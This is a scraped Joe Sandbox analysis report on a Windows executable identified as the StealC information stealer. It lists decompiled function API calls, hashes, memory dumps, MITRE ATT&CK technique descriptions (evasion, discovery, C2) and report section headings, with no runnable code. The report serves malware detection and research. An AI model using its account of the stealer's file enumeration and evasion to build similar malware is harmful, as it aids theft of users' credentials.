Opcode Fuzzy Hash: 08129ed12c23d3f194c50dc719ff5aadd717ee4d4a74a7574ffe3a5ba5cd9d49
Instruction Fuzzy Hash: 7111E971D00008AFCB04EFA9C8919EE77B9EF58314F04C05EF01667241DF38AA86CBA6

Function 00415050 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B

lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 0041508A
lstrcatA.KERNEL32(?,00782610), ref: 004150A8

Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943

Strings

aA, xrefs: 004150CF, 004150F4, 004150D2

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFindFirstFolderPathwsprintf
String ID: aA
API String ID: 2699682494-2567749500
Opcode ID: bf6810f96eb53610a0959d854b70e6bb1317e91cfa13314e8862e500998e2eb1
Instruction ID: 27646669aa04729862e240b26620d37997e147c17b59a732ce93ef494e7ce50b
Opcode Fuzzy Hash: bf6810f96eb53610a0959d854b70e6bb1317e91cfa13314e8862e500998e2eb1
Instruction Fuzzy Hash: B801D6BAA4020877C714FBB0DC42EEE333CAB55304F00415DB68A570D1EE789AC88BA6

Function 022ABCE7 Relevance: 5.3, APIs: 4, Instructions: 284stringCOMMON

Download Yara Rule

APIs

Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF

Part of subcall function 022BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022BAC2C
Part of subcall function 022BAC17: lstrcpy.KERNEL32(00000000), ref: 022BAC6B
Part of subcall function 022BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022BAC79

Part of subcall function 022BAB87: lstrcpy.KERNEL32(00000000,?), ref: 022BABD9
Part of subcall function 022BAB87: lstrcat.KERNEL32(00000000), ref: 022BABE9

Part of subcall function 022BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022BAB6C

Part of subcall function 022BAA07: lstrcpy.KERNEL32(?,00000000), ref: 022BAA4D

Part of subcall function 022AA077: memcmp.MSVCRT(?,00421264,00000003), ref: 022AA094

lstrlen.KERNEL32(00000000), ref: 022ABF06

Part of subcall function 022B9097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 022B90B9

StrStrA.SHLWAPI(00000000,004213E0), ref: 022ABF34
lstrlen.KERNEL32(00000000), ref: 022AC00C
lstrlen.KERNEL32(00000000), ref: 022AC020

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
String ID:
API String ID: 1440504306-0
Opcode ID: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
Instruction ID: 11ae1bff34aaa77961843076bef4d5c2147441a91ad80ccc7645f673f0fb5037
Opcode Fuzzy Hash: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
Instruction Fuzzy Hash: 1EB14F71920308ABCB19FBE4DD95EEE733AAF25340F504159E506A2198EF386B48CF61

Function 00413BDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16filestringCOMMON

Download Yara Rule

APIs

lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
FindClose.KERNEL32(000000FF), ref: 00413C7C

Strings

!=A, xrefs: 00413C82

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Find$CloseFileNextlstrcat
String ID: !=A
API String ID: 3840410801-2919091325
Opcode ID: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
Instruction ID: 20ec2b31cb4d991c835852fde49fc2354676703d0d5a57c203257a76fc367b8d
Opcode Fuzzy Hash: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
Instruction Fuzzy Hash: FCD012756401096BCB20EF90DD589EA7779DB55305F0041C9B40EA6150EB399B818B95

Function 022B51A7 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 022B9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022B9072

lstrcat.KERNEL32(?,00000000), ref: 022B51E1
lstrcat.KERNEL32(?,00421070), ref: 022B51FE
lstrcat.KERNEL32(?,0064A5F8), ref: 022B5212
lstrcat.KERNEL32(?,00421074), ref: 022B5224

Part of subcall function 022B4B77: wsprintfA.USER32 ref: 022B4B93
Part of subcall function 022B4B77: FindFirstFileA.KERNEL32(?,?), ref: 022B4BAA

Part of subcall function 022B4B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 022B4BD8
Part of subcall function 022B4B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 022B4BEE
Part of subcall function 022B4B77: FindNextFileA.KERNEL32(000000FF,?), ref: 022B4DE4
Part of subcall function 022B4B77: FindClose.KERNEL32(000000FF), ref: 022B4DF9

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID:
API String ID: 2667927680-0
Opcode ID: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
Instruction ID: dcba65082af861546ab149da75ec443b607c48d8ff3f7ce7734fff1f80496424
Opcode Fuzzy Hash: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
Instruction Fuzzy Hash: 1B21927AA50208ABC714FBE0DC45EE9337AAB55300F404589A68992184DE7496C9CFA2

Function 022B94C7 Relevance: 5.0, APIs: 4, Instructions: 41stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(?,?), ref: 022B94D3
lstrcpyn.KERNEL32(0064AB88,?,?), ref: 022B94F7
lstrlen.KERNEL32(?), ref: 022B950E
wsprintfA.USER32 ref: 022B952E

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID:
API String ID: 1206339513-0
Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
Instruction ID: c1bc07eefdb889a03e5b14cb0cea3a0d188a3ac37e622edcd8980fe397766342
Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
Instruction Fuzzy Hash: C201DA79540109FFCB04DFECD998EAE7BBAEF49394F108148F90A9B305C635AA40DB95

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_100f1c346cbcff15_b159fbceb9912cab3fd2e3d37e4ec18be14df62d_95985173_2e3eaac1-891a-4140-88f1-7c1710ec26ab\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3CD3.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3E1C.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3E4C.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Windows Analysis Report
100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe

Function 004045C0 Relevance: 112.1, APIs: 34, Strings: 30, Instructions: 114
stringmemoryCOMMON

Function 00419860 Relevance: 75.5, APIs: 33, Strings: 10, Instructions: 212
libraryloaderCOMMON

Function 00404880 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 479
networkstringfileCOMMON

Function 004026A0 Relevance: 708.9, APIs: 1, Strings: 403, Instructions: 1905
COMMON

Function 00419C10 Relevance: 233.4, APIs: 112, Strings: 21, Instructions: 684
libraryloaderCOMMON

Function 00406280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191
networkfileCOMMON

Function 004117A0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 160
stringCOMMON

Function 00415510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383
sleepCOMMON

Function 00417500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106
memoryCOMMON

Function 022A003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Function 004169F0 Relevance: 10.6, APIs: 7, Instructions: 89
sleepCOMMON

Function 004047B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60
stringnetworkCOMMON

Function 00401220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41
COMMON

Function 00416AF3 Relevance: 6.0, APIs: 4, Instructions: 30
sleepCOMMON